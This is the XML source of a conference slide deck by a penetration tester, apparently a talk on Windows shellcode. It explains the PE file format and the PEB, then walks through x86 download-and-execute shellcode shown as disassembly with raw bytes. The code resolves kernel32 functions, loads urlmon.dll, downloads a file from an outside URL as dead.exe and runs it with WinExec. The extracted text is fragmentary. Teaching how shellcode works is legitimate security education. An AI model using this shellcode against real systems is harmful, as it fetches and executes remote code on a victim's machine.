              <a:rPr lang="ro-RO" sz="2667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o-RO" sz="2667" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sockets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="2667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US" sz="2667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0548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0359" y="300736"/>
            <a:ext cx="10574127" cy="853440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PE File Format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330021"/>
            <a:ext cx="12192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Portable Executable (PE)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format is a file format for executables, object code, DLLs, and others used in 32-bit and 64-bit versions of Windows operating systems. The PE format is a data structure that encapsulates the information necessary for the Windows OS loader to manage the wrapped executable code.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594" y="2958572"/>
            <a:ext cx="6866813" cy="352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835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21" y="1091509"/>
            <a:ext cx="9134535" cy="59505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whoami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520" y="2600960"/>
            <a:ext cx="10840720" cy="172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400" b="1" dirty="0"/>
              <a:t>Ionut Popescu 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400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Senior Penetration Tester @ SecureWorks (secureworks.com)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400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Administrator @ Romanian Security Team (rstforums.com)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400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Speaker @ Defcon 23 (NetRipper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> post-exploitation tool)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9211844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PE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441" y="1272345"/>
            <a:ext cx="3502068" cy="541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346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MS-DOS header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03" y="1436467"/>
            <a:ext cx="9973056" cy="497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031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MS-DOS header details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966978" y="1178561"/>
          <a:ext cx="8103615" cy="4458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Document" r:id="rId3" imgW="6099983" imgH="3356174" progId="Word.Document.12">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Document" r:id="rId3" imgW="6099983" imgH="335617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78" y="1178561"/>
                        <a:ext cx="8103615" cy="445855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33069"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1444044" y="5794677"/>
          <a:ext cx="914948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3309"/>
                <a:gridCol w="5266172"/>
              </a:tblGrid>
              <a:tr h="731520">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" i="1" dirty="0" smtClean="0"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  <a:r>
                        <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – 8 bits (1 byte), “unsigned char”</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" i="1" dirty="0" smtClean="0"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r>
                        <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – 8 bits (1 byte),  “char”</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" i="1" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DWORD</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> –  4 bytes (32 bits)  “unsigned long”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300" i="1" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>LONG</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> –  4 bytes (32 bits) “long”</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" i="1" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ULONGLONG</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> –  8 bytes (64 bits) “unsigned long </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>long</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>”</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" i="1" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WORD</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0">
                          <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> –  2 bytes (16 bits) “unsigned short”</a:t>
                      </a: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1049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header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39" y="1459912"/>
            <a:ext cx="9045301" cy="490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703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header structure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13512" y="1251117"/>
          <a:ext cx="4219448" cy="208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9448"/>
              </a:tblGrid>
              <a:tr h="20848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typedef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8000FF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struct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_IMAGE_NT_HEADERS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="16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{</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="16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Signature</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="16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6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IMAGE_FILE_HEADER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FileHeader</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="16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6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IMAGE_OPTIONAL_HEADER32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OptionalHeader</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="16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6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}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IMAGE_NT_HEADERS32</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="16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,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*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PIMAGE_NT_HEADERS32</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="16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6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79274" y="3439580"/>
          <a:ext cx="3536695" cy="2991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695"/>
              </a:tblGrid>
              <a:tr h="29494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typedef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rgbClr val="8000FF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struct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_IMAGE_FILE_HEADER </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="15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{</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="15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WORD    Machine</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="15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5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WORD    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="15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NumberOfSections</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="15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5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15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TimeDateStamp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="15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5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15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PointerToSymbolTable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="15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5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15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NumberOfSymbols</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="15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5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WORD    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="15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SizeOfOptionalHeader</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="15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5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WORD    Characteristics</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="15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5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}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IMAGE_FILE_HEADER</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="15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,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5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*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PIMAGE_FILE_HEADER</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="15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5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852416" y="1290740"/>
          <a:ext cx="7071360" cy="3907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5680"/>
                <a:gridCol w="3535680"/>
              </a:tblGrid>
              <a:tr h="39075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typedef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8000FF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struct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_IMAGE_OPTIONAL_HEADER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{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WORD    Magic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BYTE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MajorLinkerVersion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BYTE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MinorLinkerVersion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SizeOfCode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SizeOfInitializedData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SizeOfUninitializedData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AddressOfEntryPoint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BaseOfCode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BaseOfData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DWORD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ImageBase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SectionAlignment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FileAlignment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WORD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MajorOperatingSystemVersion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WORD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MinorOperatingSystemVersion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WORD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MajorImageVersion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WORD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MinorImageVersion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WORD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MajorSubsystemVersion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WORD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MinorSubsystemVersion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Win32VersionValue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SizeOfImage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SizeOfHeaders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CheckSum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WORD    Subsystem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WORD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DllCharacteristics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SizeOfStackReserve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SizeOfStackCommit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SizeOfHeapReserve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SizeOfHeapCommit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LoaderFlags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NumberOfRvaAndSizes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IMAGE_DATA_DIRECTORY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DataDirectory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[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16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];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220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section table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394260"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="755904" y="1783782"/>
          <a:ext cx="4978400" cy="40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400"/>
              </a:tblGrid>
              <a:tr h="406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solidFill>
                            <a:srgbClr val="804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#define IMAGE_SIZEOF_SHORT_NAME              8</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="13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dirty="0" err="1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typedef</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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GB" sz="1300" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="8000FF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struct</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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_IMAGE_SECTION_HEADER </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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{</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="13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BYTE    Name</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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IMAGE_SIZEOF_SHORT_NAME</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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];</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="13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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1300" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="8000FF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union</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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GB" sz="13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{</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="13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DWORD   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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PhysicalAddress</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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3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DWORD   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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VirtualSize</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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3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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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}</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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Misc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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3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GB" sz="13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VirtualAddress</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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3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GB" sz="13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SizeOfRawData</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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3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GB" sz="13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PointerToRawData</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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3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GB" sz="13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PointerToRelocations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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3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GB" sz="13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PointerToLinenumbers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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3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WORD    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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NumberOfRelocations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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3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WORD    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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NumberOfLinenumbers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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3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Characteristics</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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3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}</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="13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GB" sz="1300" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="804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#define IMAGE_SIZEOF_SECTION_HEADER          40</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="13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904" y="1783783"/>
            <a:ext cx="4572000" cy="408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209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directory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216" y="1237175"/>
            <a:ext cx="5096256" cy="53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528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imports table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05" y="1436467"/>
            <a:ext cx="8962536" cy="486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441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Environment Block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9272" y="1493362"/>
            <a:ext cx="5486400" cy="173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_PEB {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="2133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sz="2133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PPEB_LDR_DATA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="2133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Ldr</a:t>
            </a:r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ro-RO" sz="2133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// 0xC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2133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o-RO" sz="2133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sz="2133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 PEB, *PPEB;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2133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3201051"/>
            <a:ext cx="7620000" cy="271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_PEB_LDR_DATA {</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="2133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o-RO" sz="2133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sz="2133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LIST_ENTRY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2133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InLoadOrderModuleList</a:t>
            </a:r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LIST_ENTRY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2133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InMemoryOrder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="2133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List; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="2133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// 0x14</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2133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LIST_ENTRY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2133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InInit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="2133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ialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2133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OrderModuleList</a:t>
            </a:r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ro-RO" sz="2133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sz="2133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 PEB_LDR_DATA, *PPEB_LDR_DATA;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2133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263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kernel32.dll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5432" y="1538693"/>
            <a:ext cx="11656568" cy="4763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00000000  33C9             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ecx,ecx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; ECX = 0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00000002  648B4130         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,[fs:ecx+0x30]  ; EAX = PEB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00000006  8B400C           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,[eax+0xc]      ; EAX = PEB-&gt;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Ldr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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00000009  8B7014           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,[eax+0x14]     ; ESI = PEB-&gt;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Ldr.In</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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0000000C  AD               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lodsd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; EAX = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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Second</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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module</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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0000000D  96               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xchg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eax,esi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; EAX = ESI, ESI = EAX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0000000E  AD               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lodsd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; EAX = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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Third</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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(kernel32)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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0000000F  8B5810           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,[eax+0x10]     ; EBX = Base address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00000012  8B533C           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,[ebx+0x3c]     ; EDX = DOS-&gt;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e_lfanew</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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00000015  03D3              add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edx,ebx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; EDX = PE Header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00000017  8B5278           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,[edx+0x78]     ; EDX = Offset export table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0000001A  03D3              add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edx,ebx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; EDX = Export table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0000001C  8B7220           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,[edx+0x20]     ; ESI = Offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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ames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table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0000001F  03F3              add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esi,ebx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; ESI = Names table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00000021  33C9             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ecx,ecx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; EXC = 0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endParaRPr lang="en-US" sz="1867" dirty="0" err="1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34892" y="2193503"/>
            <a:ext cx="10565848" cy="1107440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Multiple challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Multiple prizes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0361" y="345440"/>
            <a:ext cx="10574127" cy="853440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defcamp 2016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2833" y="1603377"/>
            <a:ext cx="10579100" cy="4889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CTF contest @ Hacking village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06952" y="4226560"/>
            <a:ext cx="10565848" cy="165608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  <a:cs typeface="+mn-cs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aseline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000" baseline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400" baseline="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20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sz="1867" kern="0" dirty="0"/>
              <a:t>Largest security operations center from the Central and Eastern Europe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1867" kern="0" dirty="0"/>
              <a:t>Hiring on multiple security related positions: Penetration Testing, Information Security etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1867" kern="0" dirty="0"/>
              <a:t>Visit our booth for more information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867" kern="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34893" y="3636434"/>
            <a:ext cx="10579100" cy="48895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200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  <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="574675" indent="-2333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aseline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000" baseline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40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bg1"/>
              </a:buClr>
              <a:buFont typeface="Museo For Dell 300" pitchFamily="50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sz="2667" kern="0" dirty="0"/>
              <a:t>SecureWorks is hiring</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2667" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3359027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GetProcAddress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360" y="1295791"/>
            <a:ext cx="11583416" cy="5340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00000023  41               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; Loop for each function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00000024  AD               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lodsd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00000025  03C3              add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eax,ebx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; Loop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untill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function name</a:t>
            </a:r>
          </a:p>
          <a:p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00000027  813847657450     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],0x50746547        ;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GetP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0000002D  75F4             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0x23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0000002F  817804726F6341   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[eax+0x4],0x41636f72    ;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rocA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00000036  75EB             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0x23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00000038  81780864647265   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[eax+0x8],0x65726464    ;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ddre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0000003F  75E2             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0x23</a:t>
            </a:r>
          </a:p>
          <a:p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00000041  8B7224           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,[edx+0x24]   ; ESI = Offset ordinals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00000044  03F3              add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esi,ebx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; ESI = Ordinals table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00000046  668B0C4E         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cx,[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esi+ecx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*2]   ; C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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Number of function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0000004A  49               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0000004B  8B721C           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,[edx+0x1c]   ; ESI = Offset address table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0000004E  03F3              add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esi,ebx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; ESI = Address table</a:t>
            </a:r>
          </a:p>
          <a:p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00000050  8B148E           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,[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esi+ecx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*4]  ; EDX = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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Pointer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(offset)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00000053  03D3              add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edx,ebx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; EDX =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GetProcAddress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endParaRPr lang="en-US" sz="1600" dirty="0" err="1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709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LoadLibrary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200" y="1641699"/>
            <a:ext cx="11315192" cy="4188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00000055  33C9             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ecx,ecx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; ECX = 0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00000057  51        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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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00000058  682E657865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0x6578652e    ; .exe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0000005D  6864656164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0x64616564    ; dead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00000062  53        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; Kernel32 base address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00000063  52        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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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GetProcAddress</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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00000064  51        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; 0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00000065  6861727941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0x41797261    ;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aryA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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0000006A  684C696272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0x7262694c    ;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Libr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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0000006F  684C6F6164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0x64616f4c    ; Load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00000074  54        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; "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LoadLibrary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00000075  53        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; Kernel32 base address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00000076  FFD2              call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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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(LL)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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endParaRPr lang="en-US" sz="1867" dirty="0" err="1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6100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 DLL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urlmon.dll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5432" y="2152045"/>
            <a:ext cx="11485880" cy="3326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00000078  83C40C            add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esp,byte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+0xc      ; pop "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LoadLibrary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0000007B  59                pop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; ECX = 0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0000007C  50        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; EAX =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LoadLibrary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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0000007D  51        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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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0000007E  66B96C6C         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cx,0x6c6c          ;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ll</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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00000082  51        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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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00000083  686F6E2E64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0x642e6e6f  ;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on.d</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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00000088  6875726C6D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0x6d6c7275  ;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urlm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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0000008D  54        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; "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urlmon.dll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0000008E  FFD0              call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o-RO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;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LoadLibrary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urlmon.dll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endParaRPr lang="en-US" sz="1867" dirty="0" err="1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8478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Get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1"/>
              <a:t>function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smtClean="0"/>
              <a:t>DLL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1" smtClean="0"/>
              <a:t>URLDownloadToFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty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968" y="1625444"/>
            <a:ext cx="11559032" cy="4476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00000090  83C410            add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esp,byte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+0x10       ; Clean stack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00000093  8B542404         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,[esp+0x4]        ; EDX =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GetProcAddress</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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00000097  33C9             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ecx,ecx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; ECX = 0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00000099  51        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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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0000009A  66B96541         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cx,0x4165            ;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eA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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0000009E  51        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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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0000009F  33C9             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ecx,ecx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; ECX = 0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000000A1  686F46696C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0x6c69466f    ;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oFil</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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000000A6  686F616454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0x5464616f    ;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oadT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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000000AB  686F776E6C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0x6c6e776f    ;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ownl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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000000B0  6855524C44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0x444c5255    ; URLD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000000B5  54        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; "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URLDownloadToFileA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000000B6  50        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;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urlmon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base address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000000B7  FFD2              call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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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GetProc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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o-RO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URLDown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO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67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endParaRPr lang="en-US" sz="1867" dirty="0" err="1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932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err="1"/>
              <a:t>Call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1"/>
              <a:t>URLDownloadToFile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360" y="1322113"/>
            <a:ext cx="11485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000000B9  33C9             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ecx,ecx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; ECX = 0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000000BB  8D542424          lea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,[esp+0x24]       ; EDX = "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dead.exe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000000BF  51                push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000000C0  51                push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000000C1  52                push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; "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dead.exe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000000C2  EB47             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short 0x10b          ; Will see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000000C4  51                push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; 0 from 10b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000000C5  FFD0              call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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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Download</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO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ro-RO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o-R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ro-RO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 Will put URL pointer on the stack as return address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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ro-R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ro-R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0000010B  E8B4FFFFFF        call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0xc4</a:t>
            </a:r>
          </a:p>
          <a:p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ro-R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http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-R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bflow.security-portal.cz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/down/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xy.txt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00000110  687474703A        push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0x3a707474 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00000115  2F                das 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00000116  2F                das </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buAutoNum type="arabicPlain" startAt="117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62666C            bound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,[esi+0x6c]</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO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189" indent="-457189"/>
            <a:r>
              <a:rPr lang="ro-R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0619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Get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1"/>
              <a:t>function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smtClean="0"/>
              <a:t>DLL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1" smtClean="0"/>
              <a:t>WinExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty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0360" y="1576676"/>
            <a:ext cx="11388344" cy="4476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000000C7  83C41C            add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esp,byte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+0x1c       ; Clean stack (URL...)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000000CA  33C9             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ecx,ecx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; ECX = 0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000000CC  5A                pop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; EDX =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GetProcAddress</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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000000CD  5B                pop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000000CE  53        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; EBX = kernel32 base address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000000CF  52        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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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000000D0  51        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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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000000D1  6878656361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0x61636578   ;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xeca</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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000000D6  884C2403         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[esp+0x3],cl</a:t>
            </a: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000000DA  6857696E45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0x456e6957   ;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WinE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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000000DF  54        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endParaRPr lang="en-US" sz="1867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000000E0  53                push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ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867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000000E1  FFD2              call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; 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GetProcAddress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WinExec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endParaRPr lang="en-US" sz="1867" dirty="0" err="1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0628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err="1"/>
              <a:t>WinExec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ExitProcess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360" y="1510714"/>
            <a:ext cx="10925048" cy="4848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000000E3  6A05              push byte +0x5          ; SW_SHOW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000000E5  8D4C2418          lea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,[esp+0x18]      ; ECX = "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dead.exe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000000E9  51                push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000000EA  FFD0              call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; Call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WinExec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o-R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exe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5)</a:t>
            </a:r>
